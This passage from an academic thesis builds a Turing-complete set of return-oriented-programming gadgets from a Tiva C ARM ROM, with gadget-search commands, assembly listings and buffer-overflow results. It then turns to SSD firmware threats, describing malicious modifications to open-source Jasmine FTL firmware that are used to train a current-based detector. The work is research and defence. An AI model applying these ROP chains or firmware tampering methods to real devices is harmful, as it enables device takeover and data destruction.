functionality.

2.4.2 Gadgets from the Tiva C

The full gadget set developed from the included ROM implements the following functions, explained with stack diagrams (all stack diagrams are displayed top-down). These gadgets illustrate the mechanics of a ROP attack on an embedded ARM device without any loss of applicability or effectiveness due to the lack of an explicit return instruction.

move: It is critical to have the ability to move values between registers. As this is a common operation, there are plenty of gadgets which are suitable. The gadget shown in Figure 2.3 moves the value from register r4 into register r0, then transfers control to the location popped into r1.

Figure 2.3: Stack Diagram - move.

Note that this gadget has two side effects. First, register r6 is overwritten by the first pop instruction. The register may be filled with either a "don't care" value or a value used by a future gadget. However, if the value in r6 must be preserved, then it should be saved before this gadget and restored afterwards.

The second side effect is the overwriting of the address in the link register that is used as a return address in the link-register style of returns. Therefore, if any gadgets using this style of return follow this gadget, then the link register must be reloaded with the appropriate address.

These two side effects demonstrate that for any gadget the potential impacts must be understood and accounted for. The attacker can compensate for them with planning, but obviously gadgets without these caveats are preferred. Similar side effects will occur with many of the gadgets presented here due to the small size and specialized nature of the code base in question.

The gadgets themselves were discovered as follows. An open source Python program, ROPgadget.py, allows users to extract all candidate ROP gadgets from a binary code segment. The provided ROM.bin file yielded 6236 potential gadgets with the following command:

ROPgadget --binary rom.bin --rawArch=arm --rawMode=thumb --thumb > ropG

This takes into account the ARM architecture and the Thumb(2) instruction mode. We were then able to search through this candidate list to find gadgets or chains of gadgets that formed our Turing-complete ROP instruction set. Figure 2 shows one example from the actual ROM, disassembled with radare2 [3]; all of the gadgets could be similarly found and displayed in the same manner.

load: The load gadget loads the value from memory location r4+4 into r0. Note that it assumes that r4 is pre-loaded, but it happens to also pop a value into r4 before returning. Therefore, if necessary, it can be called twice, the first time putting the desired r4 address on the stack. The load gadget is illustrated in Figure 2.4.

Figure 2.4: Stack Diagram - load.

load immediate: The load immediate gadget shown in Figure 2.5 will take an arbitrary value and load it into a given register. In this case, the attacker can place the arbitrary value on the stack and pop it into r4.

store: The store gadget will store the value in register r0 to a memory location at an offset of 12 from the address the attacker places in r3. Figure 2.6 shows a stack diagram of the store gadget.

The operations below can be carried out strictly by register operations, e.g., AND, or through register operations with an immediate operand, e.g., AND immediate. Above we showed that immediate values can be loaded into registers, so the operations below focus strictly on register operations assuming a value has been pre-loaded into a register, if necessary.

Figure 2.5: Stack Diagram - load immediate. This gadget allows us to load an arbitrary value, preloaded on the stack, into r0.

Figure 2.6: Stack Diagram - store. We are actually using only registers r0 and r3, and we don't care about r1 and r6, so we simply put something arbitrary on the stack in those positions when we overflow the buffer.

The result is that we are able to store whatever value we place in r0 from the stack into a memory location of our choosing by addressing with r3 minus 12. Thus, we are able to store an arbitrary value to an arbitrary location:

*(r3 + 12) <- r0

In this case, r0 = 0x7D5 = 2005 is stored in memory location r3 + 0xC = 0xBABEFAC2 + 12 = 0xBABEFACE, so that [0xBABEFACE] = 2005.

add: The add gadget sums the values in r1 and r3, then stores that sum in r1. This gadget complicates matters by ending in a bx lr command, which is the most common way to return from a legitimate subroutine. The issue is that control will be passed back to the address contained in the link register (lr), so we must proactively use the first two jumps to set lr to a value we control from the stack.

Figure 2.7: Stack Diagram - add. For all of this gadget's many statements, the end result is simply adding two operands, which we have placed in just the right locations on the stack, and placing the result in r1 (r1 = r1 + r3).

sub: As seen in Figure 2.8, r0 is subtracted from r1 and the difference is stored in r0.

negate: The gadget for negate is no different from sub. The attacker just needs to ensure zero is loaded into r1 from the stack in the first command. Thus, negation is performed via subtraction from zero.

Figure 2.8: Stack Diagram - subtract. This gadget simply subtracts r0 from r1, which we have placed in just the right locations on the stack, and places the result in r0 (r0 = r1 - r0). For negate, we must ensure that the minuend, r1, is zero on the stack, so that r0 = 0 - r0 = -r0.

not: To perform a not, an attacker could simply load zero into r1 and use the sub gadget shown in Figure 2.8 (that is, the negate described above). Since -r0 is off by 1 from a true not (in two's complement, not r0 = -r0 - 1), 1 must then be subtracted from r0; the sequence in Listing 2.7 comes right after to finish the operation.

Listing 2.7: Final part of the not gadget.

@ 0x010083f6
pop {r1, r6, pc}
@ 0x01006990
pop.w {r4, lr}
bx r1
@ 0x010058f2
subs r0, r0, 1
bx lr

and: The and gadget, as shown in Figure 2.9, performs a bitwise and between r2 and r3, storing the result in r2. Again, the link register must be set up to maintain continued control over the instruction sequence.

or: Figure 2.10 shows the or gadget. The values over which a logical or must be performed are placed in the r0 and r2 registers. Register r0 receives the result and can then store it into a memory location offset from the address in r1.

branch: A simple pop into the program counter simulates an unconditional jump to the address on the stack.

conditional branch: This conditional execution examines the value of r2, which is supplied from the stack by the attacker. If r2 equals 1, the system will branch to the address of condition A; otherwise, the branch to condition B will be followed. These branch addresses come from addresses relative to r0, which is set slightly offset from the stack pointer. This gadget can be seen by examining Figure 2.11.

Figure 2.9: Stack Diagram - and.

Figure 2.10: Stack Diagram - or.

Figure 2.11: Stack Diagram - conditional branch. This gadget obtains a comparison variable, r2, from the stack, then branches to one of two different memory locations depending on its value compared to 1.

set less than: The set less than gadget, as seen in Figure 2.12, adds the ability to conditionally set a value by comparing r0 to r1: if r0 is less than r1, r0 is set to 1; otherwise, r0 is cleared to 0.

Figure 2.12: Stack Diagram - set less than.

Control Stack Pointer: The final step in making this set of instructions Turing-complete is to have fine control over the stack pointer. This allows these ROP routines to be used multiple times efficiently without exhausting the memory resources allocated to the stack.

As ROP gadgets are called and executed, the stack pointer (sp) moves down continuously. A separate gadget must then be implemented to allow the sp to return back upwards to a specific previous location. When implemented, an attacker is then able to perform repetitious operations, such as for loops, while loops, and recursion. Without this looping ability, an attacker would have to copy repetitive segments of code to the stack the exact number of times that code would need to be executed, and would quickly run out of stack space if even a simple routine needed to be executed a significant number of times.

The included code for controlling the sp does just this. It allows the saving of the stack pointer at the beginning of a repetitious construct into the r0 register. Later, a decision must be made as to whether that construct should repeat or whether program flow should continue sequentially. The conditional branch gadget is used to make this decision; if the stack pointer needs to be reinstated to the beginning of a loop, the final command in this gadget can take the desired sp address, loaded from memory into r0 with a load gadget, and then set the sp to that address.

Listing 2.8: Control Stack Pointer.

; store initial sp value to be restored later
@ 0x01006620
mov r0, sp ; blx r2
; then use the store gadget to place r0 in RAM
; after a conditional branch, one target
; could be to restore the sp
@ 0x01000e74
ldr.w sp, [r0] ; bx r1

Delay Loop: We have implemented a delay loop using ROP techniques. This delay loop has the mechanics of a simple loop that merely increments its counter and stops once that counter has reached a pre-determined value. This would be useful for reprogramming the flash memory.

To begin, the loop counter variable is set in r5. Figure 2.13 implements a 9-iteration loop; in each iteration, the repeat condition is determined by a comparison against the value in r3. So in this example we set r3 to 9 and r5 to start at 0. On each iteration of the loop, r5 is incremented by 1. When r5 equals r3, the branch back up is not taken and a branch to the lr is taken instead.

Figure 2.13: Delay Loop.

xor: The real utility of these gadgets is that they can be cleverly tied together to perform more complex or higher-level functions. For example, no suitable single xor gadget was found in this code base. However, since all logic gates can be composed of AND and NOT gates, an xor gadget can be realized through a composition of several primitive building blocks.

The truth table for XOR shows that r0 XOR r1 can be implemented with an OR between two operands: the first operand is r0 AND NOT r1, and the second operand is NOT r0 AND r1. The stack diagram for this instruction is located in Figure 2.14, which refers to the XOR arguments as A and B.

[Figure content: two parallel stack diagrams, one per operand ordering, chaining pop, subs, movs, it ne, ands, and orrs gadgets to compute A AND NOT B and NOT A AND B and then OR the results to yield A XOR B.]

Figure 2.14: Stack Diagram - xor.
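The identity underlying this composition can be checked directly; a quick Python sketch over 32-bit values (the mask models the width of the ARM registers):

```python
MASK = 0xFFFFFFFF  # model 32-bit ARM registers

def xor_from_primitives(a, b):
    """A XOR B built only from AND, NOT, and OR, as the gadget chain does."""
    term1 = a & (~b & MASK)     # A AND NOT B
    term2 = (~a & MASK) & b     # NOT A AND B
    return (term1 | term2) & MASK

# Matches Python's native XOR for any 32-bit inputs.
assert xor_from_primitives(0xAAAAAAAA, 0xCCCCCCCC) == (0xAAAAAAAA ^ 0xCCCCCCCC)
print(hex(xor_from_primitives(0xFF00FF00, 0x0F0F0F0F)))  # prints 0xf00ff00f
```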

2.5 Experimental Results

This section shows screen shots, taken from the Keil µVision [13] debugger [12], of the program stack containing the ROP chain about to be executed. It also shows the register values both before and after each of the gadgets was executed on an example program. This is to demonstrate to the reader that these gadgets can be used to exploit the target hardware. In each of these cases, a simple buffer overflow was used to take control of the microprocessor, and the exploited program as well as the overflow strings are included with the submission of this article.

For each figure below, the leftmost screen shot of the registers shows their state just before the ROP chain begins executing and the registers on the right show their state after. The memory that contains the stack is shown in between them.

In the case of the store gadget, Figure 2.18, an additional screen shot of the memory containing the stack and the region just below it is shown so that the location where the value was stored can be seen. The move gadget set can be seen in Figure 2.15. The load gadget is shown in Figure 2.16 and the load immediate in Figure 2.17. Figure 2.19 and Figure 2.20 show the add and the subtract gadgets. The and gadget is seen in Figure 2.21 with the or gadget in Figure 2.22. Figure 2.23 shows the conditional branch gadget. The set less than gadget is shown in Figure 2.24. The delay loop is shown in Figure 2.25.

Figure 2.15: Move. The value contained in r4 is moved to r0.

Figure 2.16: Load. The value 0xDEADBEEF is loaded from memory location 0x20000FA4 into r0. Note that the stack pointer shows the bottom of the stack as 0x20000FC4 before execution begins.

Figure 2.17: Load Immediate. The value 0xDEADBEEF is popped from the stack into r4 and then moved to r0.

Figure 2.18: Store. The value 0xDEADBEEF is taken from the stack, placed in r0 and then written to memory location 0x20000FA8 which is 12 plus 0x20000F9C.

Figure 2.19: Add. The values 0x02020202 and 0x03030303 from the stack are added together and the result, 0x05050505, is placed in r1.

Figure 2.20: Sub. The value 0x02020202 is subtracted from 0x03030303 (both values are found on the stack) and the result, 0x01010101, is placed in r0.

Figure 2.21: And. The value 0x11111111 is placed in r3 and anded with the value 0x76767676 already in r2. The result, 0x10101010, finishes in r2.

Figure 2.22: Or. The two values 0xAAAAAAAA and 0xCCCCCCCC are taken from the stack and ored with each other. 0xEEEEEEEE is the result of that operation and it is placed in r0.

Figure 2.23: Conditional Branch. The value 0x00000001 is placed in r2, which indicates to branch to the location found at memory location 0x20001010. If any other value had been placed in r2, the branch to the address located at 0x2000100C would have been taken instead.
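The selection behavior of the conditional branch gadget can be modeled in a few lines (a Python model using the addresses from Figure 2.23; the memory contents shown are illustrative, not values from the target):

```python
# Model of the conditional-branch gadget's target selection: the value in
# r2 picks which stack slot supplies the next gadget address.
def select_target(r2, memory):
    slot = 0x20001010 if r2 == 0x00000001 else 0x2000100C
    return memory[slot]

# Hypothetical gadget addresses planted on the stack by the attacker.
memory = {0x20001010: 0x01006990, 0x2000100C: 0x01007D50}
print(hex(select_target(1, memory)))  # prints 0x1006990
```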

Figure 2.24: Set Less Than. The values 0x00000005 and 0x00000007 are tested. As the first value is less than the second, 0x00000001 is placed in r0. If the first value had not been less than the second, 0x00000000 would have been placed in r0.

Figure 2.25: Delay Loop. 0x00000000 is initially loaded into r5 and 0x00000009 is loaded into r3. r5 is incremented until it equals r3 and then the loop finishes. The final value of 0x00000009 can be seen in both r5 and r3.

Chapter 3

Security Analysis of Solid State Drive Firmware

3.1 Solid State Drive Security

The techniques outlined in this section are a first step towards detecting and mitigating modifications to the intended operation of embedded firmware. The work presented here focuses on Solid State Drives (SSDs), which can be viewed as a subset of these non-IoT embedded systems. SSDs are secondary storage drives which are increasingly replacing mechanical Hard Disk Drives (HDDs). SSDs address several issues that plagued mechanical drives, such as random access latency, power consumption, and reliability [31]. To realize these improvements, the physical implementation of SSDs is vastly different from that of HDDs. Instead of storing data on magnetic media, data are stored in an array of NAND flash chips, which significantly changes the nature of data access operations. Traditionally, this would mean that host systems need additional or alternative hardware and software interfaces to interact with these devices. However, to speed up the adoption curve, SSD manufacturers created Flash Translation Layers (FTLs) which run on internal SSD controllers to make an SSD effectively emulate a standard HDD to a host computer.

This FTL makes the SSD an interesting and complex device, since the on-board firmware implementing it behaves like an embedded operating system. The firmware is responsible not only for reading and writing data to flash memory, but also for performing the unique duties of the SSD such as garbage collection [78], wear leveling [28], and logical block translation [56]. Furthermore, since the firmware contains code running on the device which accepts external inputs, it can be vulnerable to exploitation. Even though SSDs are not themselves networked, their hosts are often part of a network. Thus, they are susceptible to deliberate exploitation by anyone in possession of the device, or by any malware resident on the host system or the connected network. Additionally, a newly installed SSD could already contain malware from a previous owner or through its manufacturing supply chain [20]. These scenarios would have deleterious effects on the confidentiality, integrity, and availability of data stored on an SSD.
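The logical block translation duty can be illustrated with a minimal page-mapped FTL sketch (hypothetical Python structures, not the Jasmine code; a real FTL layers garbage collection and wear leveling on top of this mapping):

```python
class PageMapFTL:
    """Toy page-mapped FTL: logical page numbers (LPNs) map to physical
    NAND pages (PPNs). Overwrites go to a fresh page because NAND cannot
    be rewritten in place; the stale page is left for garbage collection."""
    def __init__(self, num_flash_pages):
        self.map = {}                        # LPN -> PPN
        self.flash = {}                      # PPN -> data
        self.free = list(range(num_flash_pages))
        self.invalid = set()                 # stale pages awaiting reclamation

    def write(self, lpn, data):
        if lpn in self.map:
            self.invalid.add(self.map[lpn])  # old copy becomes garbage
        ppn = self.free.pop(0)
        self.flash[ppn] = data
        self.map[lpn] = ppn

    def read(self, lpn):
        return self.flash[self.map[lpn]]

ftl = PageMapFTL(num_flash_pages=8)
ftl.write(0, b'a')
ftl.write(0, b'b')                     # host sees an in-place update
print(ftl.read(0), len(ftl.invalid))   # latest data; one stale page remains
```

The host only ever sees logical addresses behaving like an HDD; the remapping, and the garbage it generates, is invisible above the SATA interface.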

The remainder of this chapter is organized as follows. Related work is discussed in section 3.2, including both firmware modification in SSDs and related devices as well as side channel analysis techniques that have been employed on SSDs. The proposed methods and experimental setup are presented in sections 3.3 and 3.5, which include a description of the Jasmine OpenSSD board used in this work and the types of modifications being made to its firmware. The firmware classification procedure is described in section 4.1.

3.2 Related Work

This section begins with a review of firmware modification in SSDs and related devices and then examines side channel analysis techniques that have been employed in the context of SSDs.

With the explosion of the Internet of Things (IoT) product space over recent years, researchers have identified and investigated a multitude of security weaknesses in the firmware of embedded devices. In 2014, Costin and Zaddach catalogued more than 32,000 firmware images across 132 products and found 38 previously unknown vulnerabilities [37]. Looking specifically at conventional hard disk drives, firmware modification attacks were implemented as early as 2013 by [43] and [102]. The latter project used public data and reverse engineering to delineate the layout and operations of the drive's firmware. They leveraged this information to hook the reading and writing operations to modify data input and output from the HDD and perform data exfiltration. This backdoor was introduced to the device via a modified firmware update and the authors claim an accompanying overhead of just 1%.

Firmware investigation and exploitation has also targeted solid state drives. In 2015, Bogaard and de Bruijn demonstrated the ability to compromise open source SSD firmware on the controller of the Jasmine board from the OpenSSD project [22]. They note that this controller, the Indilinx Barefoot SSD controller [35], is also found in the first generation OCZ Vertex SSDs. Recently, in the context of encryption analysis, researchers have demonstrated the ability to compromise commercially available firmware in both the Crucial and Samsung product lines [70]. Case studies presented included physical access through enabled JTAG debugging ports as well as unsigned code injection and execution.

There has also been work done to detect this kind of malicious activity on other embedded devices [14]. Gonzalez and Hinton used the term power fingerprinting to describe a process of determining the normal operating pattern of a device via side channel analysis [49]. Specifically, they discussed measuring power consumption or electromagnetic emissions. However, their work focuses solely on the electromagnetic emissions method. From this, they characterized the device and determined a baseline, then compared known normal samples to samples with modified firmware. Sample traces that differed significantly from the baseline were classified as tampered.

Whereas their power fingerprinting focused on electromagnetic emanations from industrial control systems, our methods are geared towards analyzing power consumption from SSDs [21, 36, 68, 97], which play an important role in the storage and transmission of critical data. As representative examples, Wendt et al. present an automated method to characterize embedded processor instruction sets using power measurements [97]. More recently, energy has been used to classify specific attacks on a Raspberry Pi (meant to be representative of IoT devices in general) [84], and power measurements in combination with network data analysis have been used for dynamic, behavior-based malware detection in a general-purpose computer [51]. As in our work, both of the latter papers utilize machine learning techniques to support classification.

Exploring side channel leakage in SSDs using current measurement is an active area of research [100] and the work presented here is part of an ongoing project that utilizes these techniques. Shey et al. demonstrated the ability to use current measurements to identify the presence of TRIM-initiated physical data removal on an SSD [83]. This work also validated the use of a non-invasive current probe. Melton et al. analyzed SSD current to infer the file system in use [71]. By creating signatures based upon spectral and principal components analysis, and discriminating with a k-nearest neighbors classifier, they were able to differentiate between NTFS, exFAT, FAT32, and EXT4 on two different SSDs. Canclini, McMasters, et al. used a similar current analysis technique to classify whether reads or writes are taking place on an SSD and achieved 100% accuracy in multiple scenarios [27]. Finally, Johnson et al. used current draw analysis to distinguish between different versions of proprietary firmware running on the same commercial SSD [101]. Our work is similar to this, but we modify and analyze an open source SSD implementation to establish ground truth about the differences between firmware versions by observing the characteristics of known code sequences.

3.3 Jasmine Flash Translation Layers

The OpenSSD project provides an opportunity for researchers to study SSD operations with open source hardware and software, as opposed to the proprietary commercial versions available on the market. The project consists of the Jasmine SSD development board, which carries a reference implementation of the ARM based Indilinx Barefoot SATA controller [35], the FPGA based Cosmos SSD development board, and the associated firmware files for each board. The Jasmine board is the focus of this research; it includes 64 MB of SDRAM, 64 GB of NAND flash, 6 GPIO pins, and debugging capabilities through JTAG and UART. There are 4 parallel channels of NAND flash with 8 banks that share an I/O bus and contain two 8-bit flash chips [66].

The Jasmine project includes 5 different versions of its Flash Translation Layer, each of which can be built into the controller firmware and sits between the Host Interface Layer and the Flash Interface Layer. These FTLs are named Dummy, Tutorial, Greedy, Dynamic dAta Clustering, and FASTer. The Dummy FTL was created by Indilinx and is the simplest FTL; it performs no reads or writes to NAND flash, so it is only useful for measuring the speed of communications over SATA and to DRAM. The Tutorial FTL is more capable; it adds a page-mapping function and initializes flash memory during every boot, but it does not include garbage collection. The Greedy FTL adds garbage collection along with the persistence of data across power cycles. This garbage collection recognizes when there is insufficient space for a new write, then chooses the block with the fewest valid pages to be the victim block; all of its valid pages are copied to an empty block and the victim block is deleted [56]. The Dynamic dAta Clustering (DAC) FTL reorganizes data into dynamic clusters when a victim block is being cleaned and also during data updates [33]. In contrast to the Greedy strategy, it clusters hot (frequently accessed) pages and cold (rarely accessed) pages separately and performs a cost benefit analysis to determine the victim block for garbage collection. The final FTL is called FASTer and is based on the Fully-associative Sector Translation (FAST) [64] FTL, which performs block address mapping as opposed to the page address mapping in the other FTLs. FASTer is optimized for online transaction processing with a method for isolating cold pages and giving valid pages a second chance to be invalidated before being merged to a data block [65]. A training data set is established by loading the Jasmine board firmware with the Greedy Flash Translation Layer provided by the OpenSSD project and a modified version of the Greedy FTL. This data set is then used to build an automated binary classifier to differentiate the operating characteristics of the original firmware from the modified version through current analysis.

Figure 3.1: OpenSSD project Jasmine development board [66]
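The Greedy victim-selection step can be sketched as follows (hypothetical block records in Python, following the usual greedy formulation of picking the block with the fewest valid pages so the least data must be copied before erasing):

```python
def choose_victim(blocks):
    """Greedy policy: the block with the fewest valid pages is cheapest
    to clean, since only its valid pages must be copied out before erase."""
    return min(blocks, key=lambda b: b['valid_pages'])

# Illustrative block states; 'valid_pages' counts pages still holding live data.
blocks = [
    {'id': 0, 'valid_pages': 120},
    {'id': 1, 'valid_pages': 7},    # cheapest victim: only 7 copies needed
    {'id': 2, 'valid_pages': 64},
]
print(choose_victim(blocks)['id'])  # prints 1
```

DAC differs from this by first partitioning pages into hot and cold clusters and weighing copy cost against expected benefit before committing to a victim.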

3.4 Threat Model

This research describes a method for detecting modification to firmware on SSDs. The ramifications of such a modification can range from benign to catastrophic. For that reason, it is necessary to consider the threat model of this class of attack in order to properly assess the associated risk. In this section, a threat model is introduced to frame a discussion pertaining to the security of the firmware on an SSD. This is done by describing interactions across three trust boundaries: an Ownership Boundary, an Internet Boundary, and a Physical Boundary.

We use the Microsoft Threat Modeling Tool [85, 91] to generate a visual representation of potential threat actions across these boundaries. In categorizing these potential threats, Microsoft has formulated the STRIDE model [75, 85]. This model groups threats into 6 broad types: spoofing identity, tampering with data, repudiation, information disclosure, denial of service, and elevation of privilege. Out of 51 potential threats identified in the Threat Modeling Tool, we prioritize a smaller subset as high risk due to their applicability to the firmware modification problem set. The majority of these threats involve either spoofing identity or tampering with data, as these actions are the most likely methods to give an attacker control of the target firmware. The threat model diagram is included in Fig. 3.2 and will be used to explain the highest risk threats in the remainder of this section.

3.4.1 Ownership Trust Boundary

The Ownership Trust Boundary exists to delineate the fact that owners of SSDs cannot trust the validity of firmware installed prior to their ownership of the device. In reality, most of the responsibility for the integrity of firmware on an SSD is out of the hands of the owner and determined before they ever take possession [20]; an SSD owner has to trust that the product was delivered with legitimate firmware installed. Unfortunately, there are no manufacturer provided methods to verify the authenticity of the firmware and there are several ways to subvert this trust.

Figure 3.2: Threat Model of potential modifications to an SSD.

During the initial sale, there are several credible risks of receiving a counterfeit product. First, an insider threat or an outsider with significant influence or resources can tamper with the firmware that ends up in the final product. Second, a malicious actor could subvert the supply chain to include a chip with an altered version of firmware, as in the Supermicro example [77]. An attacker could also subvert the manufacturing process to produce an SSD at odds with the design specifications. Finally, it is also possible for an attacker to switch a legitimate product for a counterfeit version after manufacturing but before it is distributed to a vendor or final owner [20].

Another way for the initial owner of an SSD to receive a counterfeit device is through spoofing the identity of an entity in the production process. An attacker could use social engineering techniques to represent a supplier, manufacturer, or distributor and use that trusted position to replace products with compromised versions [20, 90].

An SSD can also be acquired through the secondary market. SSDs have historically been more expensive than HDDs for the same capacity, so there exist several purchasing options for users who desire the advantages of SSDs without the high cost. Unsurprisingly, these resale options pose additional risks for buyers. For example, there is a risk of a legitimate marketplace being spoofed, since resellers share a weak link, if any link at all, with the original manufacturer [42, 55]. It is also difficult for a consumer to assess the validity or intentions of third party vendors, either in person or in online marketplaces such as eBay or Amazon [45]. Alternatively, a tampering risk stems from the fact that the device may have been previously owned or repaired. This access by an unknown party allows a window for the firmware to be modified before the SSD is in the possession of the new owner.

3.4.2 Internet Trust Boundary

The Internet Trust Boundary is the interface between the global Internet and the system containing an SSD. It exists to make SSD owners aware that firmware from unauthenticated sources on the Internet should not be implicitly trusted. Once a consumer takes ownership of a legitimate SSD, the device is still at risk of firmware modification due to built-in firmware update mechanisms [70]. Many manufacturers include a way to download and install new firmware to SSDs to provide feature updates or security patches. This can put SSD owners at risk of spoofing and repudiation if they accept and install firmware updates from unknown or weakly authenticated sources [98].

Even if a consumer is vigilant regarding firmware update sources, they face risk due to the vulnerabilities inherent in the system to which the SSD is connected. If a system is compromised by a remote attacker, that attacker may be able to tamper with the SSD firmware by injecting commands to overwrite the legitimate version.

3.4.3 Physical Trust Boundary

The Physical Trust Boundary exists to illustrate the fact that an SSD owner who does not implement appropriate physical access controls cannot be confident in the ongoing integrity of the firmware. Even if a consumer is able to acquire an SSD containing valid firmware and protect their host system from any remote intrusions, they would still need to be mindful of physical security as any attacker with local access still poses significant security risks [70].

Another threat is tampering, which can be achieved via a local elevation of privilege [103]. Flashing new firmware to an SSD requires hardware access commands that demand administrative privileges. A local attacker has a variety of options, such as escalating privileges on a system, booting the system into an administrative context, or temporarily connecting the SSD to a system under their control [23, 95]. Once privileges are elevated, a local attacker poses a tampering threat and can make changes to the SSD firmware to achieve their malicious objective.

3.4.4 Threat Model Review

Any level of modification to SSD firmware, regardless of which trust boundary is crossed, leaves that device vulnerable to information disclosure risk. Low-level modifications to the way the SSD operates could allow an attacker to create an exfiltration channel to extract sensitive data from the device to a remote server controlled by the attacker. Further, modification to SSD firmware introduces a tampering risk to the data on the disk. An attacker would have the ability to add, modify, or delete data on the disk. Such a deletion attack is covered in the remainder of this text.

Users who are concerned about the security of their sensitive data need to be aware of threats across the Ownership, Internet, and Physical boundaries. This threat model shows that modification of firmware on commercially available SSDs is a practical concern and can be realistically accomplished through a multitude of avenues. It is reasonable to assume that a motivated attacker with sufficient resources can effect some desired modification to the firmware on an SSD. Accordingly, it is critical to possess tools which can detect such modifications and give SSD owners an opportunity for remediation.

3.5 Malicious Code Injection

This section describes the attempts at modifying the authentic Greedy firmware of the Jasmine SSD so that the original could be classified against the modified version. These attempts included modifying the times when garbage collection could occur, modifying the contents of NAND flash memory directly, and modifying the contents of the DRAM buffers prior to the occurrence of reads and writes.

3.5.1 Denying Garbage Collection

The first attempt at injecting a malicious payload into the Jasmine Greedy FTL is to change the probability of garbage collection occurring. Ordinarily, garbage collection is triggered when a write request is made but more space must be made in flash memory in order to fit the data. When receiving such a request, the modified code chooses with some probability to simply ignore the garbage collection request. In the absence of a built-in random number generator, the probability of this event was determined by the current bank. Each data channel for the NAND flash controller has access to 8 different banks where data can be written. The garbage collection routine receives the current bank as an argument so that it knows which bank will be the subject of the operation.

Choosing to ignore garbage collection for any particular bank results in a 12.5% chance that any garbage collection request will be skipped. This probability can be increased with 12.5% granularity by choosing to ignore additional banks. In this case, four out of the eight banks are ignored leaving a 50% chance of garbage collection occurring during any request. A view of the original and modified firmware versions is shown in Figure 3.3. After processing the data in the frequency domain and analyzing the resulting bins using PCA, a good separability between the samples is found as shown in Figure 3.4.
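The bank-keyed skip described above can be sketched as follows (Python pseudocode of the described behavior; the function and names are hypothetical, mirroring the description rather than the Jasmine source):

```python
IGNORED_BANKS = {0, 1, 2, 3}   # 4 of the 8 banks -> 50% of requests skipped

def garbage_collect(bank, do_real_gc):
    """Modified GC entry point: silently drop requests for selected banks.
    With no RNG on the controller, the bank number stands in for chance."""
    if bank in IGNORED_BANKS:
        return False           # request ignored; free space is not reclaimed
    do_real_gc(bank)
    return True

# Over all 8 banks, exactly half of the requests are honored.
honored = sum(garbage_collect(b, lambda bank: None) for b in range(8))
print(honored)  # prints 4
```

Each ignored bank adds 12.5% to the skip probability, which is the granularity noted above.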

This separability, however, is not consistent. New samples that were not part of the training data set are classified with much lower accuracy. It turns out that this method of modification does not cause the noticeable change originally anticipated. Skipping a requested garbage collection routine does not have a lasting effect, as a new request is immediately made and quickly fulfilled. Since operation with this variation is so similar to the original version, the classifier is distinguishing based on many factors that just happen to align for any particular data set.

Figure 3.3: Current over time comparison of Greedy and Garbage Collection Modified Greedy firmware
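The frequency-domain processing and PCA projection used to assess separability can be sketched as follows (synthetic traces stand in for the recorded current data; the bin count and trace length are illustrative):

```python
import numpy as np

def fft_bin_features(traces, n_bins=32):
    """Magnitude-spectrum features: FFT each trace, then average the
    magnitudes into a fixed number of frequency bins."""
    mags = np.abs(np.fft.rfft(traces, axis=1))
    split = np.array_split(mags, n_bins, axis=1)
    return np.stack([s.mean(axis=1) for s in split], axis=1)

def pca_project(X, n_components=3):
    """Project feature vectors onto their top principal components."""
    Xc = X - X.mean(axis=0)
    _, _, Vt = np.linalg.svd(Xc, full_matrices=False)
    return Xc @ Vt[:n_components].T

rng = np.random.default_rng(0)
traces = rng.normal(size=(20, 1024))        # stand-in for current samples
scores = pca_project(fft_bin_features(traces))
print(scores.shape)                         # prints (20, 3)
```

Plotting the first three component scores per observation, colored by firmware class, yields a view comparable to Figure 3.4.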

3.5.2 Formatting NAND Flash

In an attempt to make a change that would be more consistently evident, the NAND flash is modified directly. There exists a method provided by the Flash Interface Layer to format a given bank of flash. This is a noticeable transient and would also affect the data retrieved from flash memory; some segments of files containing actual data will be cleared.

This solution also does not yield the required outcome. The flash format is a readily apparent transient, but formatting an entire bank is more destructive than desired. This method causes deleterious changes to important parts of the filesystem structure and the FTL metadata area. This causes the SSD to fail during a trial and no longer be recognized by the host operating system. It then needs to be completely reset and reflashed in order to work again.

Figure 3.4: Unmodified (red crosses) and Garbage Collection modified (blue circles) firmware observations plotted in the space of the first three principal components used in classification.

3.5.3 Clearing DRAM Buffers

As a less destructive method of collecting modified firmware trials, the Greedy FTL was altered to sporadically erase the DRAM read and write buffers. This was accomplished by choosing to erase these buffers with a given probability after every 1000 write requests made to the FTL. For normal trials, no changes were made to the SSD firmware. A successful attack of this nature compromises the integrity and availability of data written to an SSD by a host device.
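The buffer-erasing logic can be sketched as follows (a hypothetical Python model of the described behavior; the actual change lives in the FTL's write path, and the names here are illustrative):

```python
import random

CLEAR_PROBABILITY = 0.5   # chance of wiping buffers at each checkpoint
CHECK_INTERVAL = 1000     # evaluate once per 1000 write requests

class ModifiedWritePath:
    """Count write requests and, at every CHECK_INTERVAL-th request,
    clear the DRAM read/write buffers with CLEAR_PROBABILITY."""
    def __init__(self, seed=None):
        self.writes = 0
        self.cleared = 0
        self.rng = random.Random(seed)

    def on_write(self, clear_buffers):
        self.writes += 1
        if (self.writes % CHECK_INTERVAL == 0
                and self.rng.random() < CLEAR_PROBABILITY):
            clear_buffers()       # zero the DRAM read/write buffers
            self.cleared += 1

path = ModifiedWritePath(seed=1)
for _ in range(10000):
    path.on_write(lambda: None)
print(path.writes)  # 10000 writes; roughly half the 10 checkpoints fired
```

Because the wipe touches only in-flight buffers, the drive keeps responding normally, which is what makes the modification transparent to the host while still injecting visible current transients.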

Figure 3.5: Current over time comparison of Greedy and Greedy-50% firmware in [24].

The trials were collected in a clustered round robin format, alternating between five trial clusters of normal Greedy FTL firmware and five trial clusters of Modified Greedy FTL firmware. Fig. 3.5 is a plot of the first minute of one recording of the SSD current with Greedy firmware performing normal write operations (top) and a plot of the 50% probability altered version affecting a small subset of write operations (bottom). A full description of this method of modification, including the results, is included in Section 4.2. Even though this modification would be transparent to any host device storing data on the SSD, many of the injected transients can be seen with the naked eye in a time domain data set, as shown in the areas above the arrows. Our goal is to formalize the detection of these transients and classify whether or not a device is running the genuine, manufacturer-provided version of firmware.

Chapter 4

Detection of Modified Firmware on Solid State Drives

4.1 Detecting Modified Firmware

This section describes both the laboratory setup for collecting Jasmine firmware data as well as the methods for processing the data and creating a classifier.

4.1.1 Data Collection Setup

